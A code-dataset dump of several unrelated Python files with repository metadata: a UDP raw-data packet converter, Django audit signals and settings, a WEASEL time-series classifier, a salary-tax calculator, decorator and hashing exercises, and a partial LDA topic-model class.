chn_data=[[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],]
feed_loc=[]
if (jumbo_flag == True):
pkg_len = 0x1E06/2
else:
pkg_len = 0x406/2
pkg_index = []
datalength = long( (len(dataNtuple) // pkg_len) -3) * (pkg_len)
i = 0
k = []
j = 0
while (i <= datalength ):
data_a = ((dataNtuple[i+0]<<16)&0x00FFFFFFFF) + (dataNtuple[i+1]& 0x00FFFFFFFF) + 0x0000000001
data_b = ((dataNtuple[i+0+pkg_len]<<16)&0x00FFFFFFFF) + (dataNtuple[i+1+pkg_len]& 0x00FFFFFFFF)
acc_flg = ( data_a == data_b )
face_flg = ((dataNtuple[i+2+6] == 0xface) or (dataNtuple[i+2+6] == 0xfeed))
if (face_flg == True ) and ( acc_flg == True ) :
pkg_index.append(i)
i = i + pkg_len
else:
i = i + 1
k.append(i)
if ( acc_flg == False ) :
j = j + 1
if ( len(k) != 0 ):
print "raw_convertor_m.py: There are defective packages start at %d"%k[0]
if j != 0 :
print "raw_convertor_m.py: drop %d packages"%(j)
tmpa = pkg_index[0]
tmpb = pkg_index[-1]
data_a = ((dataNtuple[tmpa+0]<<16)&0x00FFFFFFFF) + (dataNtuple[tmpa+1]&0x00FFFFFFFF)
data_b = ((dataNtuple[tmpb+0]<<16)&0x00FFFFFFFF) + (dataNtuple[tmpb+1]&0x00FFFFFFFF)
if ( data_b > data_a ):
pkg_sum = data_b - data_a + 1
else:
pkg_sum = (0x100000000 + data_b) - data_a + 1
missed_pkgs = 0
for i in range(len(pkg_index)-1):
tmpa = pkg_index[i]
tmpb = pkg_index[i+1]
data_a = ((dataNtuple[tmpa+0]<<16)&0x00FFFFFFFF) + (dataNtuple[tmpa+1]&0x00FFFFFFFF)
data_b = ((dataNtuple[tmpb+0]<<16)&0x00FFFFFFFF) + (dataNtuple[tmpb+1]&0x00FFFFFFFF)
if ( data_b > data_a ):
add1 = data_b - data_a
else:
add1 = (0x100000000 + data_b) - data_a
missed_pkgs = missed_pkgs + add1 -1
if (missed_pkgs > 0 ):
print "raw_convertor_m.py: missing udp pkgs = %d, total pkgs = %d "%(missed_pkgs, pkg_sum)
print "raw_convertor_m.py: missing %.8f%% udp packages"%(100.0*missed_pkgs/pkg_sum)
else:
pass
smps_num = 0
for onepkg_index in pkg_index:
onepkgdata = dataNtuple[onepkg_index : onepkg_index + pkg_len]
i = 8
peak_len = 100
while i < len(onepkgdata) :
if (onepkgdata[i] == 0xface ) or (onepkgdata[i] == 0xfeed ):
chn_data[7].append( ((onepkgdata[i+1] & 0X0FFF)<<0 ))
chn_data[6].append( ((onepkgdata[i+2] & 0X00FF)<<4)+ ((onepkgdata[i+1] & 0XF000) >> 12))
chn_data[5].append( ((onepkgdata[i+3] & 0X000F)<<8) +((onepkgdata[i+2] & 0XFF00) >> 8 ))
chn_data[4].append( ((onepkgdata[i+3] & 0XFFF0)>>4 ))
chn_data[3].append( (onepkgdata[i+3+1] & 0X0FFF)<<0 )
chn_data[2].append( ((onepkgdata[i+3+2] & 0X00FF)<<4) + ((onepkgdata[i+3+1] & 0XF000) >> 12))
chn_data[1].append( ((onepkgdata[i+3+3] & 0X000F)<<8) + ((onepkgdata[i+3+2] & 0XFF00) >> 8 ))
chn_data[0].append( ((onepkgdata[i+3+3] & 0XFFF0)>>4) )
chn_data[15].append( ((onepkgdata[i+6+1] & 0X0FFF)<<0 ))
chn_data[14].append( ((onepkgdata[i+6+2] & 0X00FF)<<4 )+ ((onepkgdata[i+6+1] & 0XF000) >> 12))
chn_data[13].append( ((onepkgdata[i+6+3] & 0X000F)<<8 )+ ((onepkgdata[i+6+2] & 0XFF00) >> 8 ))
chn_data[12].append( ((onepkgdata[i+6+3] & 0XFFF0)>>4 ))
chn_data[11].append( ((onepkgdata[i+9+1] & 0X0FFF)<<0 ))
chn_data[10].append( ((onepkgdata[i+9+2] & 0X00FF)<<4 )+ ((onepkgdata[i+9+1] & 0XF000) >> 12))
chn_data[9].append( ((onepkgdata[i+9+3] & 0X000F)<<8 )+ ((onepkgdata[i+9+2] & 0XFF00) >> 8 ))
chn_data[8].append( ((onepkgdata[i+9+3] & 0XFFF0)>>4 ))
if (onepkgdata[i] == 0xfeed ):
feed_loc.append(smps_num)
smps_num = smps_num + 1
else:
pass
i = i + 13
return chn_data, feed_loc
def raw_convertor(raw_data, smps, jumbo_flag = True):
chn_data, feed_loc = raw_convertor_feedloc(raw_data, smps, jumbo_flag)
return chn_data
def raw_convertor_peak(raw_data, smps, jumbo_flag = True):
chn_data, feed_loc = raw_convertor_feedloc(raw_data, smps, jumbo_flag)
if ( len(feed_loc) ) > 2 :
chn_peakp=[[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],]
chn_peakn=[[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],]
for tmp in range(len(feed_loc)-1):
for chn in range(16):
chn_peakp[chn].append ( np.max(chn_data[chn][feed_loc[ tmp]:feed_loc[tmp]+100 ]) )
chn_peakn[chn].append ( np.min(chn_data[chn][feed_loc[ tmp]:feed_loc[tmp]+100 ]) )
else:
chn_peakp = None
chn_peakn = None
return chn_data, feed_loc, chn_peakp, chn_peakn
| [
"noreply@github.com"
] | sgaobnl.noreply@github.com |
027be171957866303961766d06619afe162b284c | 17c09e059f5fbd4d05b3aac5efc45451727d445b | /audit_trail/signals.py | f5511b76e95b86d91469d89b4c8e2e684bb27e53 | [
"BSD-3-Clause"
] | permissive | Dharmik8478/django-model-audit | bb5e0590b6b401727ecaa07a75201d80891934a3 | 9518a8810d9d8f937e9a374318197d88ffcc6f0f | refs/heads/master | 2021-09-14T08:23:47.704320 | 2018-05-10T10:18:03 | 2018-05-10T10:18:03 | 124,696,917 | 7 | 6 | BSD-3-Clause | 2018-05-07T10:12:08 | 2018-03-10T20:42:44 | Python | UTF-8 | Python | false | false | 98 | py | from django import dispatch
audit_ready = dispatch.Signal()
audit_m2m_ready = dispatch.Signal()
| [
"Dharmik@192.168.2.5"
] | Dharmik@192.168.2.5 |
f8718c0d7f4cfacddaa5c609343530b3ffbf96ad | b054942916d5b82c5c29e646d634a986d506ec65 | /Weasel_try1.py | 34ad40a6259a1c8aba8913c88c1538fb0b3e27cd | [] | no_license | ishanyash/Error-rates-on-UCR-TS | 21690913c71d8de8d50f2b3944eff804b3fe6967 | 2d10be12d6c6640523fcddedc9a095a0bb38803d | refs/heads/master | 2020-05-29T14:59:19.998868 | 2019-05-29T11:05:00 | 2019-05-29T11:05:00 | 189,208,814 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,407 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 24 17:44:56 2019
@author: Ishan Yash
"""
import numpy as np
from pyts.transformation import BOSS
from pyts.transformation import WEASEL
from sklearn.pipeline import Pipeline
from sklearn.linear_model import LogisticRegression
import pyts
print("pyts: {0}".format(pyts.__version__))
PATH = "G:/Coding/ML/UCRArchive_2018/"
clf = LogisticRegression(penalty='l2', C=1, fit_intercept=True,
solver='liblinear', multi_class='ovr')
dataset_adiac = "Car"
file_train_adiac = PATH + str(dataset_adiac) + "/" + str(dataset_adiac) + "_TRAIN.tsv"
file_test_adiac = PATH + str(dataset_adiac) + "/" + str(dataset_adiac) + "_TEST.tsv"
train_adiac = np.genfromtxt(fname=file_train_adiac, delimiter="\t", skip_header=0)
test_adiac = np.genfromtxt(fname=file_test_adiac, delimiter="\t", skip_header=0)
X_train_adiac, y_train_adiac = train_adiac[:, 1:], train_adiac[:, 0]
X_test_adiac, y_test_adiac = test_adiac[:, 1:], test_adiac[:, 0]
weasel_adiac = WEASEL(word_size=5, window_sizes=np.arange(6, X_train_adiac.shape[1]))
pipeline_adiac = Pipeline([("weasel", weasel_adiac), ("clf", clf)])
accuracy_adiac = pipeline_adiac.fit(
X_train_adiac, y_train_adiac).score(X_test_adiac, y_test_adiac)
print("Dataset: {}".format(dataset_adiac))
print("Accuracy on the testing set: {0:.3f}".format(accuracy_adiac)) | [
"noreply@github.com"
] | ishanyash.noreply@github.com |
ef2321b8b97d45abdc5f5a75d349f330e1d53bfe | ac82f18ea1dcb93db7224a82958012d34ddb5ae5 | /bank_systems/finance_bank_systems/4grade/bank_lab5.py | 19bb3fe7a35a5c7cec8fccce6885ed1e1e5ce0b4 | [] | no_license | rafasaurus/homework | 02c64d4ad57722307eabd5d3480ce6e552a7a8dd | ce9e6b5e696c7377b360b72b3161f1958dda4cc9 | refs/heads/master | 2021-04-30T15:21:07.422608 | 2019-04-18T19:20:50 | 2019-04-18T19:20:50 | 121,237,284 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,465 | py | import copy
def pureSalary(greedySalary_):
greedySalary = copy.deepcopy(greedySalary_)
# եկամտահարկ
if (greedySalary_ <= 150000):
greedySalary_ -= greedySalary*0.23
elif (greedySalary_ <=2000000):
greedySalary_ -= 150000*0.23 + (greedySalary - 150000)*0.28
else:
greedySalary_ -= 2000000*0.28 + (greedySalary - 2000000)*0.36
# կենսաթոշակ
if (greedySalary * 0.025 <= 12500):
greedySalary_ -= greedySalary * 0.025
else:
greedySalary_ -= 12500
# millitary stuff
greedySalary_ -= 1000
return greedySalary_
def pureHolidayFee():
holidayTaxJune, holidayPensionsJune, overallDailyFeeJune = getholidayTaxAndPensions(11, 300000)
holidayTaxJuly, holidayPensionsJuly, overallDailyFeeJuly = getholidayTaxAndPensions(9, 300000)
overallHolidayFee = overallDailyFeeJune + overallDailyFeeJuly
return overallHolidayFee - holidayTaxJune - holidayTaxJuly - holidayPensionsJune - holidayPensionsJuly
def getholidayTaxAndPensions(days, greedySalary):
# ''' returns եկամտահարկ, կենսաթոշակ, military stuff '''
premium = 200000
commitmentForWeekends = 30000
holidaySalary = 60000
pureSalary = 200000 # for 15 days that had been worked
surcharge = premium + commitmentForWeekends + holidaySalary # հավելավճար F
holidayDailyFee = (surcharge/12 + greedySalary)/21
overallDailyFee = days * holidayDailyFee
print("overallDailyFee: ", overallDailyFee)
# ____________________________________
# եկամտահարկ income tax
# աճողական գումար եկամտահարկ հունիս ամսվա
pureSalary_ = copy.deepcopy(pureSalary)
pureSalary_ += overallDailyFee
pureSalary += overallDailyFee
if (pureSalary_ <= 150000):
pureSalary_ -= pureSalary*0.23
elif (pureSalary_ <=2000000):
pureSalary_ -= 150000*0.23 + (pureSalary - 150000)*0.28
else:
pureSalary_ -= 2000000*0.28 + (pureSalary - 2000000)*0.36
# կենսաթոշակ
if (pureSalary * 0.025 <= 12500):
pensionsForMonth = pureSalary * 0.025
else:
pensionsForMonth -= 12500
# print("pensionsForMonth: ", pensionsForMonth)
incomeTaxForTheMonth = copy.deepcopy(pureSalary - pureSalary_)
# print("incomeTaxForTheMonth: ", incomeTaxForTheMonth)
# ____________________________________
# ************************************
pureSalary -= overallDailyFee
# եկամտահարկ income tax
incomTaxForDaysWorked = 0
if (pureSalary <= 150000):
incomTaxForDaysWorked = pureSalary*0.23
elif (pureSalary_ <=2000000):
incomTaxForDaysWorked = 150000*0.23 + (pureSalary - 150000)*0.28
else:
incomTaxForDaysWorked = 2000000*0.28 + (pureSalary - 2000000)*0.36
# կենսաթոշակ
if (pureSalary * 0.025 <= 12500):
pensionsForDays = pureSalary * 0.025
else:
pensionsForDays = 12500
print("pensionsForDays: ", pensionsForDays)
# ************************************
# արձակուրդի եկամտահարկ, և կենսաթոշակ
holidayTax = incomeTaxForTheMonth - incomTaxForDaysWorked
holidayPensions = pensionsForMonth - pensionsForDays
return holidayTax, holidayPensions, overallDailyFee
salary = 300000
days = 11
print("Salary: ", salary)
print("pure Salary: ", pureSalary(salary))
print("pureHolidayFee: ", pureHolidayFee())
| [
"rafa.grigorian@gmail.com"
] | rafa.grigorian@gmail.com |
338434bc1ec03b6dee0c92e2f8605e4e4d10b146 | c15321381fd501217f41a72c3c09f507ea52d75a | /server.py | 912ae5c056220794f169c6e0ff3b097cd4ac5440 | [] | no_license | coderaavan/basic_load_balancer | 5227074d12ab4b5a797a0d7122f45e1487676fd2 | cfb758ed049f91d4c3165cb0d5c5346ddd0fa1fb | refs/heads/master | 2023-05-09T01:52:12.934989 | 2021-05-21T22:00:13 | 2021-05-21T22:00:13 | 369,662,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | import socket
import threading
import time
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('', 5000))
def factorial(num):
res = 1
for i in range(1, num+1):
res*=i
return res
while True:
format = 'utf-8'
msg_len, client_addr = server.recvfrom(64)
msg_len = msg_len.decode(format)
if msg_len:
msg_len = int(msg_len)
msg, client_addr = server.recvfrom(msg_len)
msg = msg.decode(format)
res = factorial(int(msg))
| [
"prashantravi@cse.iitb.ac.in"
] | prashantravi@cse.iitb.ac.in |
b05a1a04d85fa13fa3689baf4a17a6bdfd88cd21 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/302/77727/submittedfiles/testes.py | a6dfe79fe6c3e23239396c351525102e509059c7 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | n = float(input('Digite um número: '))
if n >= 0:
n = n**(1/2)
print(n)
else:
n = n**2 | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
0019d927654af92c948b4bab9d14988d2c1a11dd | ad637ade3fd0aa5dd0f54747dc614c17c6e4c0e1 | /blog/posts/admin.py | fdef9791f37f230ce69d9f09320d7433f9187eb6 | [
"MIT"
] | permissive | fikryans/django_subcategory | 9a3a2ae35d7a9a15edafb1937b4099b528a413de | 02589392d10603a46827b0d4f176934611460d2d | refs/heads/master | 2023-04-06T22:07:44.509988 | 2021-04-04T16:11:18 | 2021-04-04T16:11:18 | 354,566,879 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | from django.contrib import admin
from mptt.admin import MPTTModelAdmin, DraggableMPTTAdmin
from .models import Category, Post
class CategoryAdmin(DraggableMPTTAdmin):
list_display=(
'tree_actions',
'indented_title',
),
list_display_links=(
'indented_title',
),
admin.site.register(Category,DraggableMPTTAdmin)
admin.site.register(Post) | [
"fikriansyah.hq@gmail.com"
] | fikriansyah.hq@gmail.com |
d1efbb180b13d3b691161c2b0e1ddc4699c66f34 | 3c12fc7a1617d9a81c69a27c46d393f4940b6b5d | /hash_requirements.py | 6bb480b67787d405d14ba317f55419c335458c7e | [] | no_license | Carl-Chinatomby/blockchain | 5c52891d557b767dd77f07d810f0631342825de9 | dce75c00e05d097bcc0c7d862d852bb249b8c21b | refs/heads/master | 2023-05-25T16:43:31.215888 | 2019-07-21T06:56:47 | 2019-07-21T06:56:47 | 124,698,626 | 0 | 0 | null | 2023-05-22T22:28:09 | 2018-03-10T21:08:28 | Python | UTF-8 | Python | false | false | 420 | py | from hashlib import sha256
x = 5
y = 0 # we don't know what y should be yet...
still_processing = True
while still_processing:
product = float(x*y)
current_hash = sha256('{}'.format(product).encode()).hexdigest()
if current_hash[-1] != '0':
print(current_hash, y)
y += 1
else:
print(current_hash, y)
still_processing = False
print('The solution to y = {}'.format(y))
| [
"Carl.Chinatomby@gmail.com"
] | Carl.Chinatomby@gmail.com |
96a91643f5d6c5d7f7005c78046cc95bcc883d24 | ec96d369ddd33bac64deb28a2d6c648bacb1b2d5 | /Commons/Constants.py | 956028e9e94e128b60a78f9061f6eeeb2bebb1f5 | [] | no_license | Deena4/Netportal | 14d5d912464e7c595df3d3ab6077d638d4f65a1d | 055deb6cdf04736bca8a7d3c305d2cd82712306e | refs/heads/master | 2022-05-22T14:36:40.248247 | 2020-04-29T10:04:19 | 2020-04-29T10:04:19 | 259,932,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | customer = "TCP_AUT_GUI_RES_CUS_000_000_001_00001_POS"
provider = "TCP_AUT_GUI_RES_PRV_000_000_001_00002_POS"
view = "TCP_AUT_GUI_CFG_VWS_000_000_001_00003_POS"
facility ="TCP_AUT_GUI_INV_MIV_L1L_LAYER1_001_00004_POS"
circuit = "TCP_AUT_GUI_INV_MIV_L1S_LAYER1_001_00005_POS" | [
"mdeenadhayalan@tieroneoss.com"
] | mdeenadhayalan@tieroneoss.com |
a58c8e03d06aea7b31bf57f64f371bdc88ac39f0 | f961397842d8952b68b9e02229d188b93b1e01ec | /Medium/Python/Chat Encyption/Hashing.py | b8b174be45cb6be7d18e431c367e5f97344a478c | [] | no_license | amrudesh1/Bios_Pentest_Task | 82a0a35b23a097c0c83432c8b3e3ae70b801666b | 2352a069a6a71914f1d857a34a1f5e91aebe5bec | refs/heads/master | 2023-02-25T15:52:25.541509 | 2021-01-29T21:46:30 | 2021-01-29T21:46:30 | 314,322,925 | 0 | 0 | null | 2021-01-29T21:46:31 | 2020-11-19T17:34:36 | Python | UTF-8 | Python | false | false | 373 | py | import hashlib
def check_message_authenticity(message, decodedHash):
return hashlib.sha512(message.encode('utf-8')).hexdigest() == decodedHash
class Hash:
def __init__(self, message=None, hash_value=None):
self.message = message
self.hash_value = hash_value
def digest_message(self):
return hashlib.sha512(self.message).hexdigest()
| [
"amrbal@gmail.com"
] | amrbal@gmail.com |
ac4e9a1ea0db7e90cc3cf5811236571156f9d628 | 98b1c2bf8c5914b8b26b793413c6c4829535896e | /future_value.py | 41b7deba067128d99d3bb5ead0c77b9ff32d8190 | [] | no_license | antosojan98/python_2016 | 20fa518b1aa02a6209b0210610e4d2363f54b32b | f490a80992fd613c0dc0a63e26ac8ec57abc1b65 | refs/heads/master | 2020-04-19T15:27:48.663658 | 2019-01-30T03:50:52 | 2019-01-30T03:50:52 | 168,275,106 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | # Get the desired future value.
future_value = float(input('Enter the desired future value: '))
# Get the annual interest rate.
rate = float(input('Enter the annual interest rate: '))
# Get the number of years that the money will appreciate.
years = int(input('Enter the number of years the money will grow: '))
# Calculate the amount needed to deposit.
present_value = future_value / (1.0 + rate)**years
# Display the amount needed to deposit.
print('You will need to deposit this amount:', present_value)
| [
"noreply@github.com"
] | antosojan98.noreply@github.com |
c0ae1a74b9dfc5d8261a68750e1af81da488d578 | 406ce23771eda2a64efcf41cce28a31e6c7ecd87 | /BOJ/1197.py | e4b5707bf9b2fff8674d1be559e89ce6902a4752 | [] | no_license | ypd01018/Algorithm | 53d22c9f30e9025af25401718066c73200a6bcb2 | 8382f3adb6f84620d929fcac128cc49fba2f7b6e | refs/heads/master | 2023-06-08T14:25:19.104589 | 2021-06-30T23:19:58 | 2021-06-30T23:19:58 | 324,764,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | import sys
import heapq
sys.setrecursionlimit(10000000);
root = [i for i in range(10010)];
pq = [];
def find(a) :
# print(' ' + str(a) + ',' + str(root[a]));
if(a == root[a]) : return a;
else :
root[a] = find(root[a]);
return root[a];
def uni(a,b) :
a = find(a);
b = find(b);
root[b] = a;
V, E = map(int, input().split())
for i in range(E) :
a,b,d = map(int, input().split());
heapq.heappush(pq,[d,a,b]);
answer = 0;
cnt = 0;
while(len(pq)>0) :
d,a,b = heapq.heappop(pq);
if(find(a) == find(b)) : continue;
answer += d;
cnt += 1;
uni(a,b);
if(cnt == V-1) : break;
print(answer);
| [
"ypd01018@naver.com"
] | ypd01018@naver.com |
68c8f33697bf9c82106bc90449fd5cc1849d5f0e | d2dfd89555fc12686c5ed348cb5dd81a2df9998e | /src/python/pants/backend/google_cloud_function/python/rules.py | 165f78d89a65c401aa1b76d395dedd2963518c55 | [
"Apache-2.0"
] | permissive | Eric-Arellano/pants | 01c8e50fec51768c6a40845479ebdef70d8f04b3 | 53a7665da8d49e440dc6d3a67b5a36024ed971a2 | refs/heads/main | 2023-06-27T15:38:13.506346 | 2023-06-20T12:25:23 | 2023-06-20T12:25:23 | 139,469,637 | 0 | 0 | Apache-2.0 | 2023-05-31T11:06:47 | 2018-07-02T16:48:31 | Python | UTF-8 | Python | false | false | 3,887 | py | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
from dataclasses import dataclass
from pants.backend.google_cloud_function.python.target_types import (
PythonGoogleCloudFunction,
PythonGoogleCloudFunctionHandlerField,
PythonGoogleCloudFunctionRuntime,
PythonGoogleCloudFunctionType,
)
from pants.backend.python.subsystems.lambdex import Lambdex, LambdexLayout
from pants.backend.python.util_rules.faas import (
BuildLambdexRequest,
BuildPythonFaaSRequest,
PythonFaaSCompletePlatforms,
)
from pants.backend.python.util_rules.faas import rules as faas_rules
from pants.core.goals.package import BuiltPackage, OutputPathField, PackageFieldSet
from pants.core.util_rules.environments import EnvironmentField
from pants.engine.rules import Get, collect_rules, rule
from pants.engine.unions import UnionRule
from pants.util.logging import LogLevel
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class PythonGoogleCloudFunctionFieldSet(PackageFieldSet):
required_fields = (PythonGoogleCloudFunctionHandlerField,)
handler: PythonGoogleCloudFunctionHandlerField
runtime: PythonGoogleCloudFunctionRuntime
complete_platforms: PythonFaaSCompletePlatforms
type: PythonGoogleCloudFunctionType
output_path: OutputPathField
environment: EnvironmentField
@rule(desc="Create Python Google Cloud Function", level=LogLevel.DEBUG)
async def package_python_google_cloud_function(
field_set: PythonGoogleCloudFunctionFieldSet,
lambdex: Lambdex,
) -> BuiltPackage:
if lambdex.layout is LambdexLayout.LAMBDEX:
return await Get(
BuiltPackage,
BuildLambdexRequest(
address=field_set.address,
target_name=PythonGoogleCloudFunction.alias,
complete_platforms=field_set.complete_platforms,
runtime=field_set.runtime,
handler=field_set.handler,
output_path=field_set.output_path,
include_requirements=True,
# The GCP-facing handler function is always `main.handler` (We pass `-M main.py -H handler` to
# Lambdex to ensure this), which is the wrapper injected by Lambdex that manages invocation of
# the actual user-supplied handler function. This arrangement works well since GCF assumes the
# handler function is housed in `main.py` in the root of the zip (you can re-direct this by
# setting a `GOOGLE_FUNCTION_SOURCE` Google Cloud build environment variable; e.g.:
# `gcloud functions deploy {--build-env-vars-file,--set-build-env-vars}`, but it's non-trivial
# to do this right or with intended effect) and the handler name you configure GCF with is just
# the unqualified function name, which we log here.
script_handler="handler",
script_module="main.py",
handler_log_message="handler",
),
)
return await Get(
BuiltPackage,
BuildPythonFaaSRequest(
address=field_set.address,
target_name=PythonGoogleCloudFunction.alias,
complete_platforms=field_set.complete_platforms,
runtime=field_set.runtime,
handler=field_set.handler,
output_path=field_set.output_path,
include_requirements=True,
include_sources=True,
reexported_handler_module=PythonGoogleCloudFunctionHandlerField.reexported_handler_module,
log_only_reexported_handler_func=True,
),
)
def rules():
return [
*collect_rules(),
UnionRule(PackageFieldSet, PythonGoogleCloudFunctionFieldSet),
*faas_rules(),
]
| [
"noreply@github.com"
] | Eric-Arellano.noreply@github.com |
c62cfe65517658f463f145d395741f69f45538a0 | c2322827160b38bedc7bb40558108aaf12fa67b4 | /blog_project/mysite/mysite/settings.py | afc0189ea6c58a9e04ac0f2a35cb495036080b05 | [] | no_license | lalitkoli11121998/django-project | a1dd74b000980d27ed970e02f5970c1575ed5a6c | beb0d4f5ea96cbdf7f08e089eaed3d12c6c29434 | refs/heads/master | 2023-03-19T06:01:55.830195 | 2021-03-14T19:29:26 | 2021-03-14T19:29:26 | 346,740,522 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,227 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
TEMPLATE_DIR = os.path.join(BASE_DIR,'blog/templates/blog')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'iu#*%$eyumke!(3du%vh#ve9y)nn#uyh6t3dpd)6v%rh-u%)e0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
LOGIN_REDIRECT_URL = '/' | [
"lalitkoli11121998@gmail.com"
] | lalitkoli11121998@gmail.com |
e1cc5bc11abd94186843e7fc04694c43421d7da3 | e871503f786f565b418a6dc9513e07d3d16bfa65 | /deco2.py | 9666f4661dfed068f15e55cfa92d136c20b2f30c | [] | no_license | JoJoJoJoJoJoJo/MyLearning | 103cc082244e15de6679670bee82e3c78863d5d5 | 9411d78618e91e87e3a12f015706bab2babb4338 | refs/heads/master | 2020-06-29T07:07:59.763022 | 2018-08-07T11:16:31 | 2018-08-07T11:16:31 | 74,441,430 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | import functools
def log(text):
if callable (text)== False:#is it a func
def dec(func):
@functools.wraps(func)
def wrapper(*args,**kw):
print "%s,begin call %s()"%(text,func.__name__)
result=func(*args,**kw)
print "End call"
return result
return wrapper
return dec
else:
@functools.wraps(text) #now text is a func
def wrapper(*args,**kw):
print "begin call %s()"%text.__name__
result=text(*args,**kw)
print "End call"
return result
return wrapper
@log("input")
def fx(t=None):
print t
@log
def fy(x=None):
print x
| [
"whr428@163.com"
] | whr428@163.com |
f10a0da37c00006c384788f1ec4d03fc2887a638 | 585a2597ce8e68e0b21568fe8f0a5ed6d1ac50a8 | /topicModelLDA.py | a6b3f8247755b4c5d2b240d562c6400b7185c122 | [] | no_license | UberHowley/mooc-file-processing | c379a09b78afa5c0609582f09dab15c9cf6a1ad8 | f06b356e21a56c5f9353965a69a5978e91c8c992 | refs/heads/master | 2021-01-17T14:07:22.593606 | 2017-04-06T23:25:58 | 2017-04-06T23:25:58 | 33,063,954 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,547 | py | __author__ = 'IH'
__project__ = 'processMOOC'
import re
from html.parser import HTMLParser
from stop_words import get_stop_words
from gensim import corpora, models
class LDAtopicModel(object):
"""
Class contains an LDA topic model for one set of documents.
Mostly exists as a way to access (and setup) topic_names
"""
number_of_topics = 1
docs = []
topic_names = []
lda = None
FORMAT_LINE = "--------------------"
def __init__(self, nt, docs_as_bow):
"""
Initialize class with documents to train the model on
:param docs_as_bow: a list of text documents as bags of words
:return: None
"""
self.docs = docs_as_bow
self.number_of_topics = nt
self.create_lda()
def create_lda(self):
"""
Runs all posts through an LDA topic model, to determine the basic topic of the post.
http://chrisstrelioff.ws/sandbox/2014/11/13/getting_started_with_latent_dirichlet_allocation_in_python.html
http://radimrehurek.com/topic_modeling_tutorial/2%20-%20Topic%20Modeling.html
:param all_docs: a list of bag of words (each string split into its own list)
:return: None
"""
print("Creating LDA topic model from " + str(len(self.docs)) + " documents.")
num_topics = self.number_of_topics
chunk_size = int(len(self.docs)/100)
if chunk_size < 1:
chunk_size = 1 # small number of sentences
all_tokens = sum(self.docs, [])
# process our stop words like all our words have been processed
tokens_stop = []
for word in get_stop_words('en'):
tokens_stop.extend(self.to_bow(word))
tokens_once = set(word for word in set(all_tokens) if all_tokens.count(word) == 1)
# remove words that appear only once or are stop words
texts = [[word for word in sentence if word not in tokens_once and word not in tokens_stop] for sentence in self.docs]
# constructing topic model
dict_lda = corpora.Dictionary(texts)
mm_corpus = [dict_lda.doc2bow(text) for text in texts]
